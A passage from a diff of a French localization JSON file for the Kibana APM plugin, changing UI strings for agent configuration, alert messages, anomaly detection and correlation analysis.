envoyé à l'API d'ingestion du serveur APM depuis un encodage fragmenté (diffusion HTTP).\nVeuillez noter qu'un léger dépassement est possible.\n\nLes unités d'octets autorisées sont \"b\", \"kb\" et \"mb\". 
\"1kb\" correspond à \"1024b\".", "xpack.apm.agentConfig.apiRequestSize.label": "Taille de la requête API", - "xpack.apm.agentConfig.apiRequestTime.description": "Durée maximale de l'ouverture d'une requête HTTP sur le serveur APM.\n\nREMARQUE : cette valeur doit être inférieure à celle du paramètre \"read_timeout\" du serveur APM.", + "xpack.apm.agentConfig.apiRequestTime.description": "Durée maximale de l'ouverture d'une requête HTTP sur le serveur APM.\n\nREMARQUE : cette valeur doit être inférieure à celle du paramètre \"read_timeout\" du serveur APM.", "xpack.apm.agentConfig.apiRequestTime.label": "Heure de la requête API", "xpack.apm.agentConfig.captureBody.description": "Pour les transactions qui sont des requêtes HTTP, l'agent peut éventuellement capturer le corps de la requête (par ex., variables POST).\nPour les transactions qui sont initiées par la réception d'un message depuis un agent de message, l'agent peut capturer le corps du message texte.", "xpack.apm.agentConfig.captureBody.label": "Capturer le corps", - "xpack.apm.agentConfig.captureHeaders.description": "Si cette option est définie sur \"true\", l'agent capturera les en-têtes de la requête HTTP et de la réponse (y compris les cookies), ainsi que les en-têtes/les propriétés du message lors de l'utilisation de frameworks de messagerie (tels que Kafka).\n\nREMARQUE : Si \"false\" est défini, cela permet de réduire la bande passante du réseau, l'espace disque et les allocations d'objets.", + "xpack.apm.agentConfig.captureHeaders.description": "Si cette option est définie sur \"true\", l'agent capturera les en-têtes de la requête HTTP et de la réponse (y compris les cookies), ainsi que les en-têtes/les propriétés du message lors de l'utilisation de frameworks de messagerie (tels que Kafka).\n\nREMARQUE : Si \"false\" est défini, cela permet de réduire la bande passante du réseau, l'espace disque et les allocations d'objets.", "xpack.apm.agentConfig.captureHeaders.label": "Capturer les en-têtes", 
"xpack.apm.agentConfig.chooseService.editButton": "Modifier", "xpack.apm.agentConfig.chooseService.service.environment.label": "Environnement", 
@@ -7384,39 +6644,33 @@ "xpack.apm.agentConfig.createConfigTitle": "Créer une configuration", "xpack.apm.agentConfig.deleteModal.cancel": "Annuler", "xpack.apm.agentConfig.deleteModal.confirm": "Supprimer", - "xpack.apm.agentConfig.deleteModal.text": "Vous êtes sur le point de supprimer la configuration du service \"{serviceName}\" et de l'environnement \"{environment}\".", "xpack.apm.agentConfig.deleteModal.title": "Supprimer la configuration", - "xpack.apm.agentConfig.deleteSection.deleteConfigFailedText": "Une erreur est survenue lors de la suppression d'une configuration de \"{serviceName}\". Erreur : \"{errorMessage}\"", "xpack.apm.agentConfig.deleteSection.deleteConfigFailedTitle": "La configuration n'a pas pu être supprimée", - "xpack.apm.agentConfig.deleteSection.deleteConfigSucceededText": "Vous avez supprimé une configuration de \"{serviceName}\" avec succès. La propagation jusqu'aux agents pourra prendre un certain temps.", "xpack.apm.agentConfig.deleteSection.deleteConfigSucceededTitle": "La configuration a été supprimée", "xpack.apm.agentConfig.editConfigTitle": "Modifier la configuration", - "xpack.apm.agentConfig.enableLogCorrelation.description": "Nombre booléen spécifiant si l'agent doit être intégré au MDC de SLF4J pour activer la corrélation de logs de suivi. Si cette option est configurée sur \"true\", l'agent définira \"trace.id\" et \"transaction.id\" pour les intervalles et transactions actifs sur le MDC. Depuis la version 1.16.0 de l'agent Java, l'agent ajoute également le \"error.id\" de l'erreur capturée au MDC juste avant le logging du message d'erreur. REMARQUE : bien qu'il soit autorisé d'activer ce paramètre au moment de l'exécution, vous ne pouvez pas le désactiver sans redémarrage.", + "xpack.apm.agentConfig.enableLogCorrelation.description": "Nombre booléen spécifiant si l'agent doit être intégré au MDC de SLF4J pour activer la corrélation de logs de suivi. 
Si cette option est configurée sur \"true\", l'agent définira \"trace.id\" et \"transaction.id\" pour les intervalles et transactions actifs sur le MDC. Depuis la version 1.16.0 de l'agent Java, l'agent ajoute également le \"error.id\" de l'erreur capturée au MDC juste avant le logging du message d'erreur. REMARQUE : bien qu'il soit autorisé d'activer ce paramètre au moment de l'exécution, vous ne pouvez pas le désactiver sans redémarrage.", "xpack.apm.agentConfig.enableLogCorrelation.label": "Activer la corrélation de logs", "xpack.apm.agentConfig.logLevel.description": "Définit le niveau de logging pour l'agent", "xpack.apm.agentConfig.logLevel.label": "Niveau de log", "xpack.apm.agentConfig.newConfig.description": "Affinez votre configuration d'agent depuis l'application APM. Les modifications sont automatiquement propagées à vos agents APM, ce qui vous évite d'effectuer un redéploiement.", - "xpack.apm.agentConfig.profilingInferredSpansEnabled.description": "Définissez cette option sur \"true\" pour que l'agent crée des intervalles pour des exécutions de méthodes basées sur async-profiler, un profiler d'échantillonnage (ou profiler statistique). En raison de la nature du fonctionnement des profilers d'échantillonnage, la durée des intervalles générés n'est pas exacte, il ne s'agit que d'estimations. \"profiling_inferred_spans_sampling_interval\" vous permet d'ajuster avec exactitude le compromis entre précision et surcharge. Les intervalles générés sont créés à la fin d'une session de profilage. Cela signifie qu'il existe un délai entre les intervalles réguliers et les intervalles générés visibles dans l'interface utilisateur. REMARQUE : cette fonctionnalité n'est pas disponible sous Windows.", + "xpack.apm.agentConfig.profilingInferredSpansEnabled.description": "Définissez cette option sur \"true\" pour que l'agent crée des intervalles pour des exécutions de méthodes basées sur async-profiler, un profiler d'échantillonnage (ou profiler statistique). 
En raison de la nature du fonctionnement des profilers d'échantillonnage, la durée des intervalles générés n'est pas exacte, il ne s'agit que d'estimations. \"profiling_inferred_spans_sampling_interval\" vous permet d'ajuster avec exactitude le compromis entre précision et surcharge. Les intervalles générés sont créés à la fin d'une session de profilage. Cela signifie qu'il existe un délai entre les intervalles réguliers et les intervalles générés visibles dans l'interface utilisateur. REMARQUE : cette fonctionnalité n'est pas disponible sous Windows.", "xpack.apm.agentConfig.profilingInferredSpansEnabled.label": "Intervalles générés par le profilage activés", "xpack.apm.agentConfig.profilingInferredSpansExcludedClasses.description": "Exclut les classes pour lesquelles aucun intervalle généré par le profiler ne doit être créé. Cette option prend en charge le caractère générique \"*\" qui correspond à zéro caractère ou plus. La correspondance n'est pas sensible à la casse par défaut. L'ajout de \"(?-i)\" au début d'un élément rend la correspondance sensible à la casse.", "xpack.apm.agentConfig.profilingInferredSpansExcludedClasses.label": "Classes exclues des intervalles générés par le profilage", - "xpack.apm.agentConfig.profilingInferredSpansIncludedClasses.description": "Si cette option est définie, l'agent ne créera des intervalles générés que pour les méthodes correspondant à cette liste. La définition d'une valeur peut diminuer légèrement la surcharge et réduire l'encombrement en ne créant des intervalles que pour les classes qui vous intéressent. Cette option prend en charge le caractère générique \"*\" qui correspond à zéro caractère ou plus. Par exemple : \"org.example.myapp.*\". La correspondance n'est pas sensible à la casse par défaut. 
L'ajout de \"(?-i)\" au début d'un élément rend la correspondance sensible à la casse.", + "xpack.apm.agentConfig.profilingInferredSpansIncludedClasses.description": "Si cette option est définie, l'agent ne créera des intervalles générés que pour les méthodes correspondant à cette liste. La définition d'une valeur peut diminuer légèrement la surcharge et réduire l'encombrement en ne créant des intervalles que pour les classes qui vous intéressent. Cette option prend en charge le caractère générique \"*\" qui correspond à zéro caractère ou plus. Par exemple : \"org.example.myapp.*\". La correspondance n'est pas sensible à la casse par défaut. L'ajout de \"(?-i)\" au début d'un élément rend la correspondance sensible à la casse.", "xpack.apm.agentConfig.profilingInferredSpansIncludedClasses.label": "Classes incluses des intervalles générés par le profilage", "xpack.apm.agentConfig.profilingInferredSpansMinDuration.description": "Durée minimale d'un intervalle généré. Veuillez noter que la durée minimale est également définie de façon implicite par l'intervalle d'échantillonnage. Toutefois, l'augmentation de l'intervalle d'échantillonnage diminue également la précision de la durée des intervalles générés.", "xpack.apm.agentConfig.profilingInferredSpansMinDuration.label": "Durée minimale des intervalles générés par le profilage", "xpack.apm.agentConfig.profilingInferredSpansSamplingInterval.description": "Fréquence à laquelle les traces de pile sont rassemblées au cours d'une session de profilage. Plus vous définissez un chiffre bas, plus les durées seront précises. Cela induit une surcharge plus élevée et un plus grand nombre d'intervalles, pour des opérations potentiellement non pertinentes. 
La durée minimale d'un intervalle généré par le profilage est identique à la valeur de ce paramètre.", "xpack.apm.agentConfig.profilingInferredSpansSamplingInterval.label": "Intervalle d'échantillonnage des intervalles générés par le profilage", - "xpack.apm.agentConfig.range.errorText": "{rangeType, select,\n between {doit être compris entre {min} et {max}}\n gt {doit être supérieur à {min}}\n lt {doit être inférieur à {max}}\n other {doit être un entier}\n }", "xpack.apm.agentConfig.recording.description": "Lorsque l'enregistrement est activé, l'agent instrumente les requêtes HTTP entrantes, effectue le suivi des erreurs, et collecte et envoie les indicateurs. Lorsque l'enregistrement n'est pas activé, l'agent agit comme un noop, sans collecter de données ni communiquer avec le serveur AMP, sauf pour rechercher la configuration mise à jour. Puisqu'il s'agit d'un commutateur réversible, les threads d'agents ne sont pas détruits lorsque le mode sans enregistrement est défini. Ils restent principalement inactifs, de sorte que la surcharge est négligeable. Vous pouvez utiliser ce paramètre pour contrôler dynamiquement si Elastic APM doit être activé ou désactivé.", "xpack.apm.agentConfig.recording.label": "Enregistrement", "xpack.apm.agentConfig.sanitizeFiledNames.description": "Il est parfois nécessaire d'effectuer un nettoyage, c'est-à-dire de supprimer les données sensibles envoyées à Elastic APM. Cette configuration accepte une liste de modèles de caractères génériques de champs de noms qui doivent être nettoyés. Ils s'appliquent aux en-têtes HTTP (y compris les cookies) et aux données \"application/x-www-form-urlencoded\" (champs de formulaire POST). 
La chaîne de la requête et le corps de la requête capturé (comme des données \"application/json\") ne seront pas nettoyés.", "xpack.apm.agentConfig.sanitizeFiledNames.label": "Nettoyer les noms des champs", - "xpack.apm.agentConfig.saveConfig.failed.text": "Une erreur est survenue pendant l'enregistrement de la configuration de \"{serviceName}\". Erreur : \"{errorMessage}\"", "xpack.apm.agentConfig.saveConfig.failed.title": "La configuration n'a pas pu être enregistrée", - "xpack.apm.agentConfig.saveConfig.succeeded.text": "La configuration de \"{serviceName}\" a été enregistrée. La propagation jusqu'aux agents pourra prendre un certain temps.", "xpack.apm.agentConfig.saveConfig.succeeded.title": "Configuration enregistrée", "xpack.apm.agentConfig.saveConfigurationButtonLabel": "Étape suivante", - "xpack.apm.agentConfig.serverTimeout.description": "Si une requête au serveur APM prend plus de temps que le délai d'expiration configuré,\nla requête est annulée et l'événement (exception ou transaction) est abandonné.\nDéfinissez sur 0 pour désactiver les délais d'expiration.\n\nAVERTISSEMENT : si les délais d'expiration sont désactivés ou définis sur une valeur élevée, il est possible que votre application rencontre des problèmes de mémoire en cas d'expiration du serveur APM.", + "xpack.apm.agentConfig.serverTimeout.description": "Si une requête au serveur APM prend plus de temps que le délai d'expiration configuré,\nla requête est annulée et l'événement (exception ou transaction) est abandonné.\nDéfinissez sur 0 pour désactiver les délais d'expiration.\n\nAVERTISSEMENT : si les délais d'expiration sont désactivés ou définis sur une valeur élevée, il est possible que votre application rencontre des problèmes de mémoire en cas d'expiration du serveur APM.", "xpack.apm.agentConfig.serverTimeout.label": "Délai d'expiration du serveur", "xpack.apm.agentConfig.servicePage.alreadyConfiguredOption": "déjà configuré", "xpack.apm.agentConfig.servicePage.cancelButton": 
"Annuler", 
@@ -7432,9 +6686,9 @@ "xpack.apm.agentConfig.settingsPage.notFound.message": "La configuration demandée n'existe pas", "xpack.apm.agentConfig.settingsPage.notFound.title": "Désolé, une erreur est survenue", "xpack.apm.agentConfig.settingsPage.saveButton": "Enregistrer la configuration", - "xpack.apm.agentConfig.spanFramesMinDuration.description": "Dans ses paramètres par défaut, l'agent APM collectera une trace de la pile avec chaque intervalle enregistré.\nBien qu'il soit très pratique de trouver l'endroit exact dans votre code qui provoque l'intervalle, la collecte de cette trace de la pile provoque une certaine surcharge. \nLorsque cette option est définie sur une valeur négative, telle que \"-1ms\", les traces de pile sont collectées pour tous les intervalles. En choisissant une valeur positive, par ex. \"5ms\", la collecte des traces de pile se limitera aux intervalles dont la durée est égale ou supérieure à la valeur donnée, par ex. 5 millisecondes.\n\nPour désactiver complètement la collecte des traces de pile des intervalles, réglez la valeur sur \"0ms\".", + "xpack.apm.agentConfig.spanFramesMinDuration.description": "Dans ses paramètres par défaut, l'agent APM collectera une trace de la pile avec chaque intervalle enregistré.\nBien qu'il soit très pratique de trouver l'endroit exact dans votre code qui provoque l'intervalle, la collecte de cette trace de la pile provoque une certaine surcharge. \nLorsque cette option est définie sur une valeur négative, telle que \"-1ms\", les traces de pile sont collectées pour tous les intervalles. En choisissant une valeur positive, par ex. \"5ms\", la collecte des traces de pile se limitera aux intervalles dont la durée est égale ou supérieure à la valeur donnée, par ex. 
5 millisecondes.\n\nPour désactiver complètement la collecte des traces de pile des intervalles, réglez la valeur sur \"0ms\".", "xpack.apm.agentConfig.spanFramesMinDuration.label": "Durée minimale des cadres des intervalles", - "xpack.apm.agentConfig.stackTraceLimit.description": "En définissant cette option sur 0, la collecte des traces de pile sera désactivée. Toute valeur entière positive sera utilisée comme nombre maximal de cadres à collecter. La valeur -1 signifie que tous les cadres seront collectés.", + "xpack.apm.agentConfig.stackTraceLimit.description": "En définissant cette option sur 0, la collecte des traces de pile sera désactivée. Toute valeur entière positive sera utilisée comme nombre maximal de cadres à collecter. La valeur -1 signifie que tous les cadres seront collectés.", "xpack.apm.agentConfig.stackTraceLimit.label": "Limite de trace de pile", "xpack.apm.agentConfig.stressMonitorCpuDurationThreshold.description": "Durée minimale requise pour déterminer si le système est actuellement sous tension ou si la tension précédemment détectée a été allégée. Toutes les mesures réalisées pendant ce laps de temps doivent être cohérentes par rapport au seuil concerné pour pouvoir détecter un changement d'état de tension. La valeur doit être d'au moins \"1m\".", "xpack.apm.agentConfig.stressMonitorCpuDurationThreshold.label": "Seuil de durée de tension CPU du monitoring", 
@@ -7450,7 +6704,7 @@ "xpack.apm.agentConfig.transactionIgnoreUrl.label": "Ignorer les transactions basées sur les URL", "xpack.apm.agentConfig.transactionMaxSpans.description": "Limite la quantité d'intervalles enregistrés par transaction.", "xpack.apm.agentConfig.transactionMaxSpans.label": "Nb maxi d'intervalles de transaction", - "xpack.apm.agentConfig.transactionSampleRate.description": "Par défaut, l'agent échantillonnera chaque transaction (par ex. requête à votre service). Pour réduire la surcharge et les exigences de stockage, vous pouvez définir le taux d'échantillonnage sur une valeur comprise entre 0,0 et 1,0. La durée globale et le résultat des transactions non échantillonnées seront toujours enregistrés, mais pas les informations de contexte, les étiquettes ni les intervalles.", + "xpack.apm.agentConfig.transactionSampleRate.description": "Par défaut, l'agent échantillonnera chaque transaction (par ex. requête à votre service). Pour réduire la surcharge et les exigences de stockage, vous pouvez définir le taux d'échantillonnage sur une valeur comprise entre 0,0 et 1,0. La durée globale et le résultat des transactions non échantillonnées seront toujours enregistrés, mais pas les informations de contexte, les étiquettes ni les intervalles.", "xpack.apm.agentConfig.transactionSampleRate.label": "Taux d'échantillonnage des transactions", "xpack.apm.agentConfig.unsavedSetting.tooltip": "Non enregistré", "xpack.apm.agentMetrics.java.gcRate": "Taux RM", 
@@ -7480,49 +6734,48 @@ "xpack.apm.alerts.action_variables.transactionType": "Type de transaction pour lequel l'alerte est créée", "xpack.apm.alerts.action_variables.triggerValue": "Valeur ayant dépassé le seuil et déclenché l'alerte", "xpack.apm.alerts.action_variables.viewInAppUrl": "Lien vers la vue ou la fonctionnalité d'Elastic qui peut être utilisée pour examiner l'alerte et son contexte de manière plus approfondie", + "xpack.apm.alerts.alertStatusFilter.active": "Actif", + "xpack.apm.alerts.alertStatusFilter.button.legend": "Filtrer par", + "xpack.apm.alerts.alertStatusFilter.recovered": "Récupéré", + "xpack.apm.alerts.alertStatusFilter.showAll": "Afficher tout", "xpack.apm.alerts.anomalySeverity.criticalLabel": "critique", "xpack.apm.alerts.anomalySeverity.majorLabel": "majeur", - "xpack.apm.alerts.anomalySeverity.minor": "mineur", - "xpack.apm.alerts.anomalySeverity.scoreDetailsDescription": "score {value} {value, select, critical {} other {et plus}}", + "xpack.apm.alerts.anomalySeverity.minor": "mineure", "xpack.apm.alerts.anomalySeverity.warningLabel": "avertissement", "xpack.apm.alertTypes.anomaly.description": "Alerte lorsque la latence, le rendement ou le taux de transactions ayant échoué d'un service est anormal.", - "xpack.apm.alertTypes.errorCount.defaultActionMessage": "L'alerte \\{\\{alertName\\}\\} se déclenche en raison des conditions suivantes :\n\n- Nom de service : \\{\\{context.serviceName\\}\\}\n- Environnement : \\{\\{context.environment\\}\\}\n- Seuil : \\{\\{context.threshold\\}\\} erreurs\n- Valeur de déclenchement : \\{\\{context.triggerValue\\}\\} erreurs sur la dernière période de \\{\\{context.interval\\}\\}", + "xpack.apm.alertTypes.errorCount.defaultActionMessage": "L'alerte \\{\\{alertName\\}\\} se déclenche en raison des conditions suivantes :\n\n- Nom de service : \\{\\{context.serviceName\\}\\}\n- Environnement : \\{\\{context.environment\\}\\}\n- Seuil : \\{\\{context.threshold\\}\\} erreurs\n- Valeur de déclenchement : 
\\{\\{context.triggerValue\\}\\} erreurs sur la dernière période de \\{\\{context.interval\\}\\}", "xpack.apm.alertTypes.errorCount.description": "Alerte lorsque le nombre d'erreurs d'un service dépasse un seuil défini.", - "xpack.apm.alertTypes.errorCount.reason": "Le nombre d'erreurs est {measured} dans le dernier {interval} pour {serviceName}. Alerte lorsque > {threshold}.", - "xpack.apm.alertTypes.transactionDuration.defaultActionMessage": "L'alerte \\{\\{alertName\\}\\} se déclenche en raison des conditions suivantes :\n\n- Nom de service : \\{\\{context.serviceName\\}\\}\n- Type : \\{\\{context.transactionType\\}\\}\n- Environnement : \\{\\{context.environment\\}\\}\n- Seuil de latence : \\{\\{context.threshold\\}\\} ms\n- Latence observée : \\{\\{context.triggerValue\\}\\} sur la dernière période de \\{\\{context.interval\\}\\}", + "xpack.apm.alertTypes.transactionDuration.defaultActionMessage": "L'alerte \\{\\{alertName\\}\\} se déclenche en raison des conditions suivantes :\n\n- Nom de service : \\{\\{context.serviceName\\}\\}\n- Type : \\{\\{context.transactionType\\}\\}\n- Environnement : \\{\\{context.environment\\}\\}\n- Seuil de latence : \\{\\{context.threshold\\}\\} ms\n- Latence observée : \\{\\{context.triggerValue\\}\\} sur la dernière période de \\{\\{context.interval\\}\\}", "xpack.apm.alertTypes.transactionDuration.description": "Alerte lorsque la latence d'un type de transaction spécifique dans un service dépasse le seuil défini.", - "xpack.apm.alertTypes.transactionDuration.reason": "La latence de {aggregationType} est {measured} dans le dernier {interval} pour {serviceName}. 
Alerte lorsque > {threshold}.", - "xpack.apm.alertTypes.transactionDurationAnomaly.defaultActionMessage": "L'alerte \\{\\{alertName\\}\\} se déclenche en raison des conditions suivantes :\n\n- Nom de service : \\{\\{context.serviceName\\}\\}\n- Type : \\{\\{context.transactionType\\}\\}\n- Environnement : \\{\\{context.environment\\}\\}\n- Seuil de sévérité : \\{\\{context.threshold\\}\\}\n- Valeur de sévérité : \\{\\{context.triggerValue\\}\\}\n", - "xpack.apm.alertTypes.transactionDurationAnomaly.reason": "Une anomalie {severityLevel} avec un score de {measured} a été détectée dans le dernier {interval} pour {serviceName}.", - "xpack.apm.alertTypes.transactionErrorRate.defaultActionMessage": "L'alerte \\{\\{alertName\\}\\} se déclenche en raison des conditions suivantes :\n\n- Nom de service : \\{\\{context.serviceName\\}\\}\n- Type : \\{\\{context.transactionType\\}\\}\n- Environnement : \\{\\{context.environment\\}\\}\n- Seuil : \\{\\{context.threshold\\}\\} %\n- Valeur de déclenchement : \\{\\{context.triggerValue\\}\\} % des erreurs sur la dernière période de \\{\\{context.interval\\}\\}", + "xpack.apm.alertTypes.transactionDurationAnomaly.defaultActionMessage": "L'alerte \\{\\{alertName\\}\\} se déclenche en raison des conditions suivantes :\n\n- Nom de service : \\{\\{context.serviceName\\}\\}\n- Type : \\{\\{context.transactionType\\}\\}\n- Environnement : \\{\\{context.environment\\}\\}\n- Seuil de sévérité : \\{\\{context.threshold\\}\\}\n- Valeur de sévérité : \\{\\{context.triggerValue\\}\\}\n", + "xpack.apm.alertTypes.transactionErrorRate.defaultActionMessage": "L'alerte \\{\\{alertName\\}\\} se déclenche en raison des conditions suivantes :\n\n- Nom de service : \\{\\{context.serviceName\\}\\}\n- Type : \\{\\{context.transactionType\\}\\}\n- Environnement : \\{\\{context.environment\\}\\}\n- Seuil : \\{\\{context.threshold\\}\\} %\n- Valeur de déclenchement : \\{\\{context.triggerValue\\}\\} % des erreurs sur la dernière période de 
\\{\\{context.interval\\}\\}", "xpack.apm.alertTypes.transactionErrorRate.description": "Alerte lorsque le taux d'erreurs de transaction d'un service dépasse un seuil défini.", - "xpack.apm.alertTypes.transactionErrorRate.reason": "L'échec des transactions est {measured} dans le dernier {interval} pour {serviceName}. Alerte lorsque > {threshold}.", "xpack.apm.analyzeDataButton.label": "Explorer les données", "xpack.apm.analyzeDataButton.tooltip": "La fonctionnalité Explorer les données vous permet de sélectionner et de filtrer les données de résultat dans toute dimension et de rechercher la cause ou l'impact des problèmes de performances", - "xpack.apm.anomaly_detection.error.invalid_license": "Pour utiliser la détection des anomalies, vous devez disposer d'une licence Elastic Platinum. Cette licence vous permet de monitorer vos services à l'aide du Machine Learning.", - "xpack.apm.anomaly_detection.error.missing_read_privileges": "Vous devez disposer des privilèges \"read\" (lecture) pour le Machine Learning et l'APM pour consulter les tâches de détection des anomalies", - "xpack.apm.anomaly_detection.error.missing_write_privileges": "Vous devez disposer des privilèges \"write\" (écriture) pour le Machine Learning et l'APM pour créer des tâches de détection des anomalies", - "xpack.apm.anomaly_detection.error.not_available": "Le Machine Learning est indisponible", - "xpack.apm.anomaly_detection.error.not_available_in_space": "Le Machine Learning est indisponible dans l'espace sélectionné", + "xpack.apm.anomaly_detection.error.invalid_license": "Pour utiliser la détection des anomalies, vous devez disposer d'une licence Elastic Platinum. 
Cette licence vous permet de monitorer vos services à l'aide du Machine Learning.", + "xpack.apm.anomaly_detection.error.missing_read_privileges": "Vous devez disposer des privilèges \"read\" (lecture) pour le Machine Learning et l'APM pour consulter les tâches de détection des anomalies", + "xpack.apm.anomaly_detection.error.missing_write_privileges": "Vous devez disposer des privilèges \"write\" (écriture) pour le Machine Learning et l'APM pour créer des tâches de détection des anomalies", + "xpack.apm.anomaly_detection.error.not_available": "Le Machine Learning est indisponible", + "xpack.apm.anomaly_detection.error.not_available_in_space": "Le Machine Learning est indisponible dans l'espace sélectionné", "xpack.apm.anomalyAlert.name": "Anomalie", - "xpack.apm.anomalyDetection.createJobs.failed.text": "Une erreur est survenue lors de la création d'une ou de plusieurs tâches de détection des anomalies pour les environnements de service APM [{environments}]. Erreur : \"{errorMessage}\"", "xpack.apm.anomalyDetection.createJobs.failed.title": "Les tâches de détection des anomalies n'ont pas pu être créées", - "xpack.apm.anomalyDetection.createJobs.succeeded.text": "Tâches de détection des anomalies créées avec succès pour les environnements de service APM [{environments}]. Le démarrage de l'analyse du trafic à la recherche d'anomalies par le Machine Learning va prendre un certain temps.", "xpack.apm.anomalyDetection.createJobs.succeeded.title": "Tâches de détection des anomalies créées", "xpack.apm.anomalyDetectionSetup.jobFetchFailureText": "Impossible de déterminer l'état de la configuration de la détection des anomalies.", "xpack.apm.anomalyDetectionSetup.linkLabel": "Détection des anomalies", - "xpack.apm.anomalyDetectionSetup.notEnabledForEnvironmentText": "La détection des anomalies n'est pas encore activée pour l'environnement \"{currentEnvironment}\". 
Cliquez pour continuer la configuration.", "xpack.apm.anomalyDetectionSetup.notEnabledText": "La détection des anomalies n'est pas encore activée. Cliquez pour continuer la configuration.", "xpack.apm.anomalyDetectionSetup.upgradeableJobsText": "Mises à jour disponibles pour les tâches de détection des anomalies existantes.", "xpack.apm.anomalyScore": "Anomalie {severity, select, minor {mineure} major {majeure} critical {critique}}", "xpack.apm.api.apiKeys.securityRequired": "Le plug-in de sécurité est requis", - "xpack.apm.api.fleet.cloud_apm_package_policy.requiredRoleOnCloud": "Opération autorisée uniquement pour les utilisateurs Elastic Cloud disposant du rôle de superutilisateur.", + "xpack.apm.api.fleet.cloud_apm_package_policy.requiredRoleOnCloud": "Opération autorisée uniquement pour les utilisateurs Elastic Cloud disposant du rôle de superutilisateur.", "xpack.apm.api.fleet.fleetSecurityRequired": "Les plug-ins Fleet et Security sont requis", "xpack.apm.apmDescription": "Collecte automatiquement les indicateurs et les erreurs de performances détaillés depuis vos applications.", "xpack.apm.apmSchema.index": "Schéma du serveur APM - Index", "xpack.apm.apmServiceGroups.index": "Groupes de services APM - Index", "xpack.apm.apmSettings.index": "Paramètres APM - Index", + "xpack.apm.betaBadgeDescription": "Cette fonctionnalité est actuellement en version bêta. Si vous rencontrez des bugs ou si vous souhaitez apporter des commentaires, ouvrez un ticket de problème ou visitez notre forum de discussion.", + "xpack.apm.betaBadgeLabel": "Bêta", "xpack.apm.chart.annotation.version": "Version", + "xpack.apm.chart.comparison.defaultPreviousPeriodLabel": "Période précédente", "xpack.apm.chart.cpuSeries.processAverageLabel": "Moyenne de processus", "xpack.apm.chart.cpuSeries.processMaxLabel": "Max de processus", "xpack.apm.chart.cpuSeries.systemAverageLabel": "Moyenne du système", 
@@ -7532,10 +6785,11 @@ "xpack.apm.chart.memorySeries.systemMaxLabel": "Max.", "xpack.apm.coldstartRate": "Taux de démarrage à froid", "xpack.apm.coldstartRate.chart.coldstartRate": "Taux de démarrage à froid (moy.)", - "xpack.apm.compositeSpanCallsLabel": ", {count} appels, sur une moyenne de {duration}", + "xpack.apm.comparison.expectedBoundsTitle": "Limites attendues", + "xpack.apm.comparison.mlExpectedBoundsDisabledText": "Limites attendues (la détection d'anomalie doit être activée pour l’environnement)", + "xpack.apm.comparison.mlExpectedBoundsText": "Limites attendues", "xpack.apm.compositeSpanDurationLabel": "Durée moyenne", "xpack.apm.correlations.cancelButtonTitle": "Annuler", - "xpack.apm.correlations.ccsWarningCalloutBody": "Les données pour l'analyse de corrélation n'ont pas pu être totalement récupérées. Cette fonctionnalité est prise en charge uniquement à partir des versions {version} et ultérieures.", "xpack.apm.correlations.ccsWarningCalloutTitle": "Compatibilité de recherche inter-clusters", "xpack.apm.correlations.correlationsTable.errorMessage": "Impossible de récupérer", "xpack.apm.correlations.correlationsTable.excludeDescription": "Exclure la valeur", 
@@ -7552,28 +6806,24 @@ "xpack.apm.correlations.failedTransactions.correlationsTable.pValueDescription": "La probabilité d'obtenir au moins cette quantité de nom du champ et de valeur pour les transactions ayant échoué, compte tenu de sa prévalence dans les transactions réussies.", "xpack.apm.correlations.failedTransactions.correlationsTable.pValueLabel": "valeur-p", "xpack.apm.correlations.failedTransactions.correlationsTable.scoreLabel": "Score", - "xpack.apm.correlations.failedTransactions.correlationsTable.scoreTooltip": "Score [0-1] d'un attribut ; plus le score est élevé, plus un attribut contribue à l'échec des transactions.", + "xpack.apm.correlations.failedTransactions.correlationsTable.scoreTooltip": "Score [0-1] d'un attribut ; plus le score est élevé, plus un attribut contribue à l'échec des transactions.", "xpack.apm.correlations.failedTransactions.correlationsTable.successPercentageDescription": "Pourcentage de fois où le terme apparaît dans des transactions ayant réussi.", "xpack.apm.correlations.failedTransactions.correlationsTable.successPercentageLabel": "% de réussite", "xpack.apm.correlations.failedTransactions.errorTitle": "Une erreur est survenue lors de l'exécution de corrélations sur les transactions ayant échoué", - "xpack.apm.correlations.failedTransactions.helpPopover.basicExplanation": "Les corrélations vous aident à découvrir les attributs qui ont le plus d'influence pour distinguer les échecs et les succès d'une transaction. Les transactions sont considérées comme un échec lorsque leur valeur {field} est {value}.", "xpack.apm.correlations.failedTransactions.helpPopover.performanceExplanation": "Cette analyse réalise des recherches statistiques sur un grand nombre d'attributs. Pour les plages temporelles étendues et les services ayant un rendement de transactions élevé, cela peut prendre un certain temps. 
Réduisez la plage temporelle pour améliorer les performances.", "xpack.apm.correlations.failedTransactions.helpPopover.tableExplanation": "Le tableau est trié par scores, qui sont mappés aux niveaux d'impact élevé, moyen ou bas. Les attributs ayant un niveau d'impact élevé sont plus susceptibles de faire échouer les transactions.", "xpack.apm.correlations.failedTransactions.helpPopover.title": "Corrélations des transactions ayant échoué", "xpack.apm.correlations.failedTransactions.panelTitle": "Distribution de la latence des transactions ayant échoué", "xpack.apm.correlations.failedTransactions.tableTitle": "Corrélations", - "xpack.apm.correlations.fieldContextPopover.addFilterAriaLabel": "Filtrer sur le {fieldName} : \"{value}\"", - "xpack.apm.correlations.fieldContextPopover.calculatedFromSampleDescription": "Calculé à partir d'un échantillon de {sampleSize} documents", "xpack.apm.correlations.fieldContextPopover.descriptionTooltipContent": "Afficher le top 10 des valeurs de champ", - "xpack.apm.correlations.fieldContextPopover.fieldTopValuesLabel": "Top 10 des valeurs", - "xpack.apm.correlations.fieldContextPopover.notTopTenValueMessage": "Le terme sélectionné n'est pas dans le top 10", - "xpack.apm.correlations.fieldContextPopover.removeFilterAriaLabel": "Exclure le {fieldName} : \"{value}\"", + "xpack.apm.correlations.fieldContextPopover.fieldTopValuesLabel": "Top 10 des valeurs", + "xpack.apm.correlations.fieldContextPopover.notTopTenValueMessage": "Le terme sélectionné n'est pas dans le top 10", "xpack.apm.correlations.fieldContextPopover.topFieldValuesAriaLabel": "Afficher le top 10 des valeurs de champ", "xpack.apm.correlations.highImpactText": "Élevé", "xpack.apm.correlations.latencyCorrelations.advancedStatisticsLabel": "Statistiques avancées", "xpack.apm.correlations.latencyCorrelations.advancedStatisticsTooltipContent": "Activer des informations statistiques supplémentaires pour obtenir les résultats de la corrélation.", 
